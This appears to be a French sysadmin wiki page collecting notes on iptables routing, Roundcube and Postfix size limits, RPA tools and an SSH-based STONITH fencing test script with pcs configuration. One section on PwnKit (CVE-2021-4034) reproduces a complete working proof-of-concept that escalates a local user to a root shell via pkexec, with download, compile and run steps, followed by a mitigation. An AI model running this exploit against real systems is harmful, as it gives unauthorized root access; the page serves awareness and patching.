blog
Table des matières
- 2026:
- 2025:
4 billet(s) pour juillet 2026
| Procédure simple augmentation de la SWAP | 2026/07/17 15:49 | Jean-Baptiste |
| Exemple git clone avec Ansible | 2026/07/16 14:47 | Jean-Baptiste |
| Windows exe - Comparaison de fichiers binaires | 2026/07/16 10:25 | Jean-Baptiste |
| Pb git | 2026/07/01 17:36 | Jean-Baptiste |
Routage sous GNU/Linux
echo 1 > /proc/sys/net/ipv4/ip_forward
Autoriser tout
iptables -P FORWARD ACCEPT
Autoriser eth0 à accéder à Internet
iptables -A FORWARD -i eth0 -o ppp0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i ppp0 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
Exemple de conf
-A INPUT -i virbr4 -p udp -m udp --dport 53 -j ACCEPT -A INPUT -i virbr4 -p tcp -m tcp --dport 53 -j ACCEPT -A INPUT -i virbr4 -p udp -m udp --dport 67 -j ACCEPT -A INPUT -i virbr4 -p tcp -m tcp --dport 67 -j ACCEPT -A FORWARD -d 192.168.2.0/24 -i enp130s0 -o virbr4 -j ACCEPT -A FORWARD -s 192.168.2.0/24 -i virbr4 -o enp130s0 -j ACCEPT -A FORWARD -i virbr4 -o virbr4 -j ACCEPT -A FORWARD -o virbr4 -j REJECT --reject-with icmp-port-unreachable -A FORWARD -i virbr4 -j REJECT --reject-with icmp-port-unreachable -A OUTPUT -o virbr4 -p udp -m udp --dport 68 -j ACCEPT
Roundcube pb de taille msg Le fichier téléversé dépasse la taille maximale de 2,0 Mo
Erreur “Le fichier téléversé dépasse la taille maximale de 2,0 Mo”
/etc/php/7.0/fpm/php.ini
upload_max_filesize = 2M
/etc/php/7.0/fpm/php.ini
post_max_size = 8M
systemctl restart php7.0-fpm.service
Autres
Erreur SMTP : Message size exceeds server limit
postconf -d | grep message_size_limit message_size_limit = 10240000
(10240000 / 1024) / 1024 = 9,76 Mo
postconf -e 'message_size_limit = 20240000'
systemctl reload postfix
Rootkit pwnkit - local privilege escalation vulnerability pkexec cve-2021-4034
Voir aussi :
2022-01-27
12 ans que GNU/Lunix était vulnérable
Source :
cve-2021-4034-poc.c
/* * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu> * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shell = "#include <stdio.h>\n" "#include <stdlib.h>\n" "#include <unistd.h>\n\n" "void gconv() {}\n" "void gconv_init() {\n" " setuid(0); setgid(0);\n" " seteuid(0); setegid(0);\n" " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n" " exit(0);\n" "}"; int main(int argc, char *argv[]) { FILE *fp; system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"); system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"); fp = fopen("pwnkit/pwnkit.c", "w"); fprintf(fp, "%s", shell); fclose(fp); system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL }; execve("/usr/bin/pkexec", (char*[]){NULL}, env); }
curl https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c gcc cve-2021-4034-poc.c
$ ./a.out #
Solution
Mise à jours ou
$ ls -l /usr/bin/pkexec -rwsr-xr-x 1 root root 23440 3 juin 2021 /usr/bin/pkexec $ LANG=C stat /usr/bin/pkexec |grep ^Access Access: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2022-01-27 14:01:49.383667085 +0100 $ sudo chmod -s /usr/bin/pkexec
Robotic Process Automation (RPA)
Voir aussi :
- Process Mining
Logiciels :
- Espanso
<https://fr.wikipedia.org/wiki/AutoHotkey|AutoHotkey (windows)>
- OpenRPA
Logiciels privateurs :
- uipath (Process Mining)
Script de test STONITH fencing cluster
Voir :
Voir aussi :
Source :
Ce script permet d'émuler le “fencing” via SSH, à des fins de test. Compatible cman, pacemaker et pcs
/usr/sbin/fence_ssh
#!/bin/sh # A fence agent for cman and pacemaker, using ssh. # The only required argument is nodename. # Author: # klwang (http://klwang.info) # Note: # authorized_keys configuration are required # just for test, enjoy it! # Source : https://github.com/wklxd/misc/blob/master/fence_ssh SSH_COMMAND="/usr/bin/ssh -q -x -o PasswordAuthentication=no -o StrictHostKeyChecking=no -n -l root" #REBOOT_COMMAND="echo '/sbin/reboot -nf' | SHELL=/bin/sh at now >/dev/null 2>&1" REBOOT_COMMAND="shutdown -r now >/dev/null 2>&1" nodename= action=reboot usage () { /bin/echo "Usage: $0 -n NAME [-o ACTION]" /bin/echo /bin/echo " -n NODENAME" /bin/echo " The name of the node to be fenced." /bin/echo " In case it contains spaces, use double quotes." /bin/echo " -o ACTION" /bin/echo " What to do; on|off|list|monitor|reboot(default)." /bin/echo exit 0 } arg_cmd() { while getopts ":n:p:o:h" opt; do case "$opt" in n|p) nodename=$OPTARG ;; o) action=$OPTARG ;; h) action="usage" ;; *) usage ;; esac done } arg_stdin() { eval $(cat -) if [ "x$nodename" = "x" -a "x$port" != "x" ]; then nodename=$port # pacemaker only use port fi } metadata() { cat <<EOF <?xml version="1.0" ?> <resource-agent name="fence_ssh" shortdesc="ssh fence agent, work both for cman and pacemaker"> <longdesc> The style come from fence_pcmk, http://www.clusterlabs.org Some functions references external/ssh agent </longdesc> <vendor-url> http://klwang.info </vendor-url> <parameters> <parameter name="action" unique="1"> <getopt mixed="-o" /> <content type="string" default="reboot" /> <shortdesc lang="en">Fencing Action</shortdesc> </parameter> <parameter name="nodename" unique="1"> <getopt mixed="-n" /> <content type="string" /> <shortdesc lang="en">Name of machine</shortdesc> </parameter> <parameter name="port" unique="1"> <getopt mixed="-p" /> <content type="string" /> <shortdesc lang="en">Name of machine, equal to nodename</shortdesc> </parameter> <parameter name="help" unique="1"> <getopt mixed="-h" /> <content type="string" /> <shortdesc lang="en">Display help and exit</shortdesc> </parameter> </parameters> <actions> <action name="reboot" /> <action name="on" /> <action name="off" /> <action name="list" /> <action name="status" /> <action name="metadata" /> </actions> </resource-agent> EOF exit 0 } get_usable_ip() { for ip in `/usr/bin/getent hosts $1 | cut -d" " -f1`; do if ping -w1 -c1 $ip > /dev/null 2>&1 then echo $ip return 0 fi done return 1 } is_host_up() { for j in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15; do if ping -w1 -c1 "$1" >/dev/null 2>&1 then sleep 1 else return 1 fi done return 0 } reboot() { local node=$1 ip=`get_usable_ip $node` if [ $? -ne 0 ];then /bin/echo "Error: can not get a usable ip, is nodename($node) alive!" exit 0 # in case power lose fi if ! ping -c1 -w1 $ip >/dev/null 2>&1; then exit 0 # in case the node have been fenced fi $SSH_COMMAND $ip "echo $(date +'%Y-%m-%d %H:%M') FENC_FROM_SSH \$SSH_CLIENT >> /var/log/fenc.log" $SSH_COMMAND $ip "$REBOOT_COMMAND" if `is_host_up $ip`; then exit 1 else exit 0 fi } #main if [ $# -gt 0 ]; then arg_cmd $* else arg_stdin fi case "$action" in metadata) metadata ;; usage) usage ;; on|off) exit 0 # ssh can not turn on a node # so avoiding turn it down ;; reset|reboot) reboot $nodename ;; monitor) exit 0 # just for pacemaker ;; help) usage ;; *) /bin/echo "Unkonw options" exit 1 ;; esac
Configuration
pcs stonith create fencessh_node1 fence_ssh nodename=node1 pcmk_host_list=node1 pcs stonith create fencessh_node2 fence_ssh nodename=node2 pcmk_host_list=node2 pcs stonith level add 1 node1 fencessh_node1 pcs stonith level add 1 node2 fencessh_node2 # Interdire le fence de soi-même pcs constraint location fencessh_node1 avoids node1 pcs constraint location fencessh_node2 avoids node2
Test
pcs stonith fence node2
Autres
Lister
pcs stonith list
stonith_admin -I
blog.txt · Dernière modification : de 127.0.0.1
